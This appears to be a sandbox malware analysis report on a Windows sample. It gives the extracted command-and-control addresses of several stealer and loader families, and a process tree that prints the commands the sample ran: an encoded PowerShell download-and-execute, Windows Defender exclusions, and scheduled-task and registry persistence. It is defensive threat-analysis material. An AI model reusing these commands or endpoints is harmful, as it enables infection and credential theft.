Analysis

  • max time kernel
    75s
  • max time network
    143s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    28-10-2021 14:33

General

  • Target

    aac7861a3beff9b0f769ecbf617ee8e4c44ff1bf077bbe266fc4fcfe5bf92703.exe

  • Size

    186KB

  • MD5

    68182b16334c8170c73c571fa10f147a

  • SHA1

    de83396eab9ee9eff7c445b5778b402051d78725

  • SHA256

    aac7861a3beff9b0f769ecbf617ee8e4c44ff1bf077bbe266fc4fcfe5bf92703

  • SHA512

    9492b95a8d36303a6758ec9c88cfff04c9d2ae8b905b928be60c3689aa5ef1eedcc7314c513ca4854a78dc73e1381aaf735ad3bc136581d02977487037e17aa1

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://xacokuo8.top/

http://hajezey1.top/

http://nusurtal4f.net/

http://netomishnetojuk.net/

http://escalivrouter.net/

http://nick22doom4.net/

http://wrioshtivsio.su/

http://nusotiso4.su/

http://rickkhtovkka.biz/

http://palisotoliso.net/

http://planilhasvba.com.br/wp-admin/js/k/index.php

http://rpk32ubon.ac.th/backup/k/index.php

http://4urhappiness.com/app/k/index.php

http://swedenkhabar.com/wp-admin/js/k/index.php

http://cio.lankapanel.net/wp-admin/js/k/index.php

http://fcmsites.com.br/canal/wp-admin/js/k/index.php

http://lacoibipitanga.com.br/maxart/k/index.php

http://lacoibipitanga.com.br/cgi-bin/k/index.php

http://video.nalahotel.com/k/index.php

http://diving-phocea.com/wp-admin/k/index.php

rc4.i32
rc4.i32
rc4.i32
rc4.i32
rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

999323

C2

93.115.20.139:28978

Extracted

Family

amadey

Version

2.70

C2

185.215.113.45/g4MbvE/index.php

Extracted

Family

vidar

Version

41.6

Botnet

754

C2

https://mas.to/@lilocc

Attributes
  • profile_id

    754

Extracted

Family

redline

Botnet

SafeInstaller

C2

185.183.32.161:80

Extracted

Family

raccoon

Botnet

60e59be328fbd2ebac1839ea99411dccb00a6f49

Attributes
  • url4cnc

    http://telegin.top/agrybirdsgamerept

    http://ttmirror.top/agrybirdsgamerept

    http://teletele.top/agrybirdsgamerept

    http://telegalive.top/agrybirdsgamerept

    http://toptelete.top/agrybirdsgamerept

    http://telegraf.top/agrybirdsgamerept

    https://t.me/agrybirdsgamerept

rc4.plain
rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Turns off Windows Defender SpyNet reporting 2 TTPs
  • UAC bypass 3 TTPs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Windows security bypass 2 TTPs
  • Nirsoft 3 IoCs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 21 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 10 IoCs
  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 6 IoCs
  • Modifies registry class 7 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 1 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\aac7861a3beff9b0f769ecbf617ee8e4c44ff1bf077bbe266fc4fcfe5bf92703.exe
    "C:\Users\Admin\AppData\Local\Temp\aac7861a3beff9b0f769ecbf617ee8e4c44ff1bf077bbe266fc4fcfe5bf92703.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2748
    • C:\Users\Admin\AppData\Local\Temp\aac7861a3beff9b0f769ecbf617ee8e4c44ff1bf077bbe266fc4fcfe5bf92703.exe
      "C:\Users\Admin\AppData\Local\Temp\aac7861a3beff9b0f769ecbf617ee8e4c44ff1bf077bbe266fc4fcfe5bf92703.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:3756
  • C:\Users\Admin\AppData\Local\Temp\4A44.exe
    C:\Users\Admin\AppData\Local\Temp\4A44.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:2224
    • C:\Users\Admin\AppData\Local\Temp\4A44.exe
      C:\Users\Admin\AppData\Local\Temp\4A44.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:3592
  • C:\Users\Admin\AppData\Local\Temp\5169.exe
    C:\Users\Admin\AppData\Local\Temp\5169.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    PID:436
  • C:\Users\Admin\AppData\Local\Temp\535E.exe
    C:\Users\Admin\AppData\Local\Temp\535E.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Checks SCSI registry key(s)
    • Suspicious behavior: MapViewOfSection
    PID:2880
  • C:\Users\Admin\AppData\Local\Temp\5989.exe
    C:\Users\Admin\AppData\Local\Temp\5989.exe
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Checks processor information in registry
    PID:1272
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c taskkill /im 5989.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\5989.exe" & del C:\ProgramData\*.dll & exit
      2⤵
        PID:3612
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /im 5989.exe /f
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1596
        • C:\Windows\SysWOW64\timeout.exe
          timeout /t 6
          3⤵
          • Delays execution with timeout.exe
          PID:1300
    • C:\Users\Admin\AppData\Local\Temp\6551.exe
      C:\Users\Admin\AppData\Local\Temp\6551.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3036
      • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
        "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe"
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:3044
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2564
          • C:\Windows\SysWOW64\reg.exe
            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\603c0340b4\
            4⤵
              PID:1720
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN sqtvvs.exe /TR "C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe" /F
            3⤵
            • Creates scheduled task(s)
            PID:2492
          • C:\Users\Admin\AppData\Local\Temp\1780464471\1780464471.exe
            "C:\Users\Admin\AppData\Local\Temp\1780464471\1780464471.exe"
            3⤵
            • Executes dropped EXE
            PID:3284
      • C:\Users\Admin\AppData\Local\Temp\7531.exe
        C:\Users\Admin\AppData\Local\Temp\7531.exe
        1⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2032
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\afolder" mkdir "C:\Users\Admin\AppData\Local\Temp\afolder"
          2⤵
            PID:2648
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c if not exist "C:\Users\Admin\AppData\Local\Temp\xtmp" mkdir "C:\Users\Admin\AppData\Local\Temp\xtmp"
            2⤵
              PID:3064
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp
              2⤵
                PID:3548
                • C:\Windows\SysWOW64\attrib.exe
                  attrib +h C:\Users\Admin\AppData\Local\Temp\xtmp
                  3⤵
                  • Views/modifies file attributes
                  PID:1256
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c echo:0>C:\Users\Admin\AppData\Local\Temp\is64.txt
                2⤵
                  PID:1932
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\is64.bat
                  2⤵
                    PID:2220
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp61802.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp61802.bat"
                    2⤵
                      PID:3764
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp35662.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp35662.exe"
                      2⤵
                        PID:2904
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp61802.bat "C:\Users\Admin\AppData\Local\Temp\7531.exe"
                        2⤵
                          PID:1332
                          • C:\Windows\System32\cmd.exe
                            C:\Windows\Sysnative\cmd.exe /C C:\Users\Admin\AppData\Local\Temp\xtmp\tmp61802.bat "C:\Users\Admin\AppData\Local\Temp\7531.exe"
                            3⤵
                              PID:1392
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell -w h -enc IAAkAGEAPQBpAHcAcgAgACcAaAB0AHQAcAA6AC8ALwA0ADUALgA2ADEALgAxADMANwAuADEANwAyAC8AeQByAGQALgBwAHMAMQAnACAALQBVAHMAZQBCAGEAcwBpAGMAUABBAHIAcwBpAG4AZwAgAHwAaQBlAHgA
                                4⤵
                                • Blocklisted process makes network request
                                • Suspicious use of AdjustPrivilegeToken
                                PID:852
                                • C:\Windows\system32\wscript.exe
                                  "C:\Windows\system32\wscript.exe" C:\Users\Admin\AppData\Local\Temp\start.vbs
                                  5⤵
                                    PID:1656
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp61802.bat" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp61802.bat"
                              2⤵
                                PID:1856
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c if exist "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp35662.exe" del "C:\Users\Admin\AppData\Local\Temp\xtmp\tmp35662.exe"
                                2⤵
                                  PID:1412
                              • C:\Users\Admin\AppData\Local\Temp\7997.exe
                                C:\Users\Admin\AppData\Local\Temp\7997.exe
                                1⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1016
                              • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                1⤵
                                • Executes dropped EXE
                                PID:3908
                              • C:\Users\Admin\AppData\Local\Temp\7F16.exe
                                C:\Users\Admin\AppData\Local\Temp\7F16.exe
                                1⤵
                                • Executes dropped EXE
                                • Modifies registry class
                                PID:3036
                                • C:\ProgramData\136.exe
                                  "C:\ProgramData\136.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: MapViewOfSection
                                  • Suspicious use of WriteProcessMemory
                                  PID:3548
                              • C:\Users\Admin\AppData\Local\Temp\889D.exe
                                C:\Users\Admin\AppData\Local\Temp\889D.exe
                                1⤵
                                • Executes dropped EXE
                                PID:3888
                              • C:\Users\Admin\AppData\Local\Temp\8C57.exe
                                C:\Users\Admin\AppData\Local\Temp\8C57.exe
                                1⤵
                                • Executes dropped EXE
                                PID:1920
                              • C:\Windows\System32\rundll32.exe
                                C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                1⤵
                                  PID:4048
                                • C:\Users\Admin\AppData\Local\Temp\9716.exe
                                  C:\Users\Admin\AppData\Local\Temp\9716.exe
                                  1⤵
                                  • Executes dropped EXE
                                  PID:604
                                  • C:\Users\Admin\AppData\Local\Temp\D2BUILD.exe
                                    "C:\Users\Admin\AppData\Local\Temp\D2BUILD.exe"
                                    2⤵
                                    • Executes dropped EXE
                                    • Windows security modification
                                    • Checks whether UAC is enabled
                                    • System policy modification
                                    PID:4048
                                    • C:\Users\Admin\AppData\Local\Temp\2fe2d17c-9947-4734-a948-12b21f02cec5\AdvancedRun.exe
                                      "C:\Users\Admin\AppData\Local\Temp\2fe2d17c-9947-4734-a948-12b21f02cec5\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\2fe2d17c-9947-4734-a948-12b21f02cec5\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                      3⤵
                                      • Executes dropped EXE
                                      PID:1292
                                      • C:\Users\Admin\AppData\Local\Temp\2fe2d17c-9947-4734-a948-12b21f02cec5\AdvancedRun.exe
                                        "C:\Users\Admin\AppData\Local\Temp\2fe2d17c-9947-4734-a948-12b21f02cec5\AdvancedRun.exe" /SpecialRun 4101d8 1292
                                        4⤵
                                        • Executes dropped EXE
                                        PID:628
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\D2BUILD.exe" -Force
                                      3⤵
                                        PID:1324
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\D2BUILD.exe" -Force
                                        3⤵
                                          PID:3636
                                      • C:\Users\Admin\AppData\Local\Temp\vloj0H8SMHnt6nz.exe
                                        "C:\Users\Admin\AppData\Local\Temp\vloj0H8SMHnt6nz.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:448
                                        • C:\Users\Admin\AppData\Local\Temp\vloj0H8SMHnt6nz.exe
                                          "{path}"
                                          3⤵
                                            PID:4452
                                      • C:\Users\Admin\AppData\Local\Temp\9B9B.exe
                                        C:\Users\Admin\AppData\Local\Temp\9B9B.exe
                                        1⤵
                                        • Executes dropped EXE
                                        PID:1076
                                      • C:\Users\Admin\AppData\Local\Temp\CD4.exe
                                        C:\Users\Admin\AppData\Local\Temp\CD4.exe
                                        1⤵
                                          PID:1032
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\돞동동돚뎪뎮뎧뎫돇뎮뎹돗돗돘뎦\svchost.exe" -Force
                                            2⤵
                                              PID:2376
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\CD4.exe" -Force
                                              2⤵
                                                PID:3160
                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Microsoft.NET\Framework\돞동동돚뎪뎮뎧뎫돇뎮뎹돗돗돘뎦\svchost.exe" -Force
                                                2⤵
                                                  PID:660
                                                • C:\Users\Admin\AppData\Local\Temp\CD4.exe
                                                  C:\Users\Admin\AppData\Local\Temp\CD4.exe
                                                  2⤵
                                                    PID:2868
                                                • C:\Users\Admin\AppData\Local\Temp\1409.exe
                                                  C:\Users\Admin\AppData\Local\Temp\1409.exe
                                                  1⤵
                                                    PID:3564
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\䳰䳱䳳䲽䲾䳞䳰䳘䳁䴂䳔䳰䳜䲽䳅\svchost.exe" -Force
                                                      2⤵
                                                        PID:4744
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1409.exe" -Force
                                                        2⤵
                                                          PID:4804
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Public\Documents\䳰䳱䳳䲽䲾䳞䳰䳘䳁䴂䳔䳰䳜䲽䳅\svchost.exe" -Force
                                                          2⤵
                                                            PID:4876
                                                          • C:\Users\Admin\AppData\Local\Temp\1409.exe
                                                            C:\Users\Admin\AppData\Local\Temp\1409.exe
                                                            2⤵
                                                              PID:4992
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 2232
                                                              2⤵
                                                              • Program crash
                                                              PID:4340
                                                          • C:\Users\Admin\AppData\Local\Temp\1E2C.exe
                                                            C:\Users\Admin\AppData\Local\Temp\1E2C.exe
                                                            1⤵
                                                              PID:4404
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\ΆΆῨΆῩῸᾷῶῷῬ῞ι῎`᾿\svchost.exe" -Force
                                                                2⤵
                                                                  PID:964
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1E2C.exe" -Force
                                                                  2⤵
                                                                    PID:4872
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\ΆΆῨΆῩῸᾷῶῷῬ῞ι῎`᾿\svchost.exe" -Force
                                                                    2⤵
                                                                      PID:4240
                                                                    • C:\Users\Admin\AppData\Local\Temp\1E2C.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\1E2C.exe
                                                                      2⤵
                                                                        PID:4596
                                                                    • C:\Users\Admin\AppData\Local\Temp\286E.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\286E.exe
                                                                      1⤵
                                                                        PID:5004
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\䮭䮫䭹䮩䭻䮹䮫䮵䮪䮨䭽䮿䭺䭼䮪\svchost.exe" -Force
                                                                          2⤵
                                                                            PID:2976
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\286E.exe" -Force
                                                                            2⤵
                                                                              PID:3576
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\䮭䮫䭹䮩䭻䮹䮫䮵䮪䮨䭽䮿䭺䭼䮪\svchost.exe" -Force
                                                                              2⤵
                                                                                PID:2964
                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                              1⤵
                                                                                PID:4224
                                                                              • C:\Windows\explorer.exe
                                                                                C:\Windows\explorer.exe
                                                                                1⤵
                                                                                  PID:4592
                                                                                • C:\Windows\explorer.exe
                                                                                  explorer.exe
                                                                                  1⤵
                                                                                    PID:4520
                                                                                  • C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\603c0340b4\sqtvvs.exe
                                                                                    1⤵
                                                                                      PID:4752
                                                                                    • C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
                                                                                      "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
                                                                                      1⤵
                                                                                        PID:5368

                                                                                      Network

                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                      Execution

                                                                                      Scheduled Task

                                                                                      1
                                                                                      T1053

                                                                                      Persistence

                                                                                      Registry Run Keys / Startup Folder

                                                                                      1
                                                                                      T1060

                                                                                      Scheduled Task

                                                                                      1
                                                                                      T1053

                                                                                      Hidden Files and Directories

                                                                                      1
                                                                                      T1158

                                                                                      Privilege Escalation

                                                                                      Bypass User Account Control

                                                                                      1
                                                                                      T1088

                                                                                      Scheduled Task

                                                                                      1
                                                                                      T1053

                                                                                      Defense Evasion

                                                                                      Disabling Security Tools

                                                                                      4
                                                                                      T1089

                                                                                      Modify Registry

                                                                                      7
                                                                                      T1112

                                                                                      Bypass User Account Control

                                                                                      1
                                                                                      T1088

                                                                                      Hidden Files and Directories

                                                                                      1
                                                                                      T1158

                                                                                      Credential Access

                                                                                      Credentials in Files

                                                                                      3
                                                                                      T1081

                                                                                      Discovery

                                                                                      Query Registry

                                                                                      3
                                                                                      T1012

                                                                                      System Information Discovery

                                                                                      4
                                                                                      T1082

                                                                                      Peripheral Device Discovery

                                                                                      1
                                                                                      T1120

                                                                                      Collection

                                                                                      Data from Local System

                                                                                      3
                                                                                      T1005

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      • C:\ProgramData\1234.exe.zip
                                                                                        MD5

                                                                                        117148e50d4ef797f67da251274f4af1

                                                                                        SHA1

                                                                                        9e3057ff9a01406e60cafd1add2118e9eb3ad8b8

                                                                                        SHA256

                                                                                        396c019b85a69d08d25d4d9833e16d1c4885d45e650ecf3a04840c4a5827cea6

                                                                                        SHA512

                                                                                        2519f7d43660bd34d059bcf4ba17ad3196185c1ebd774d45f7831559eb3d9694c45448d1fbef358c859ba53dec6c13387c719131d62480e285157b46986ec396

                                                                                      • C:\ProgramData\136.exe
                                                                                        MD5

                                                                                        db9a089c112621e85cc2d4c80fed0f18

                                                                                        SHA1

                                                                                        da57e61cdd11fb924f5db5a4b093c25d37f040cf

                                                                                        SHA256

                                                                                        9c53ac5c4df5af245263ee0d01c159378b285911fe85e10b7669b9224570a5dd

                                                                                        SHA512

                                                                                        a853e2e559a521b5cc273cd170cacbe81fed256547c0174a2b8e5d9aadc5f78ef6b6b9ea90f879fbdfd9db9ab98a702ec2dc048d48db754360cfe5c8031e7a5d

                                                                                      • C:\ProgramData\136.exe
                                                                                        MD5

                                                                                        db9a089c112621e85cc2d4c80fed0f18

                                                                                        SHA1

                                                                                        da57e61cdd11fb924f5db5a4b093c25d37f040cf

                                                                                        SHA256

                                                                                        9c53ac5c4df5af245263ee0d01c159378b285911fe85e10b7669b9224570a5dd

                                                                                        SHA512

                                                                                        a853e2e559a521b5cc273cd170cacbe81fed256547c0174a2b8e5d9aadc5f78ef6b6b9ea90f879fbdfd9db9ab98a702ec2dc048d48db754360cfe5c8031e7a5d

                                                                                      • C:\ProgramData\freebl3.dll
                                                                                        MD5

                                                                                        ef2834ac4ee7d6724f255beaf527e635

                                                                                        SHA1

                                                                                        5be8c1e73a21b49f353c2ecfa4108e43a883cb7b

                                                                                        SHA256

                                                                                        a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba

                                                                                        SHA512

                                                                                        c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2

                                                                                      • C:\ProgramData\mozglue.dll
                                                                                        MD5

                                                                                        8f73c08a9660691143661bf7332c3c27

                                                                                        SHA1

                                                                                        37fa65dd737c50fda710fdbde89e51374d0c204a

                                                                                        SHA256

                                                                                        3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

                                                                                        SHA512

                                                                                        0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

                                                                                      • C:\ProgramData\msvcp140.dll
                                                                                        MD5

                                                                                        109f0f02fd37c84bfc7508d4227d7ed5

                                                                                        SHA1

                                                                                        ef7420141bb15ac334d3964082361a460bfdb975

                                                                                        SHA256

                                                                                        334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

                                                                                        SHA512

                                                                                        46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

                                                                                      • C:\ProgramData\nss3.dll
                                                                                        MD5

                                                                                        bfac4e3c5908856ba17d41edcd455a51

                                                                                        SHA1

                                                                                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                                                                                        SHA256

                                                                                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                                                                                        SHA512

                                                                                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                                                                                      • C:\ProgramData\softokn3.dll
                                                                                        MD5

                                                                                        a2ee53de9167bf0d6c019303b7ca84e5

                                                                                        SHA1

                                                                                        2a3c737fa1157e8483815e98b666408a18c0db42

                                                                                        SHA256

                                                                                        43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083

                                                                                        SHA512

                                                                                        45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8

                                                                                      • C:\ProgramData\vcruntime140.dll
                                                                                        MD5

                                                                                        7587bf9cb4147022cd5681b015183046

                                                                                        SHA1

                                                                                        f2106306a8f6f0da5afb7fc765cfa0757ad5a628

                                                                                        SHA256

                                                                                        c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

                                                                                        SHA512

                                                                                        0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                        MD5

                                                                                        a1e6ce0f4f5e7fbe77c81a87ccb7914d

                                                                                        SHA1

                                                                                        ae167cbd6a3ffab4784ba85e8721ac1de25d50a6

                                                                                        SHA256

                                                                                        b1150b36b73d1bd92f76545d1f4672e423a9924496887c96d9a6b8f46036b979

                                                                                        SHA512

                                                                                        04ae840fb9bc622b683519723c57710c5f0eb7d2d9776d0787ac27b8f20f19d40b38421fb65a7828ab76100223b0503209e80543a32abfde626d56ae97c4b25f

                                                                                      • C:\Users\Admin\AppData\Local\Temp\1409.exe
                                                                                        MD5

                                                                                        385a34c394381d51e652e4cb2ed1af7c

                                                                                        SHA1

                                                                                        8a7aefebbda89bc02b09809c278a2c445af86ffb

                                                                                        SHA256

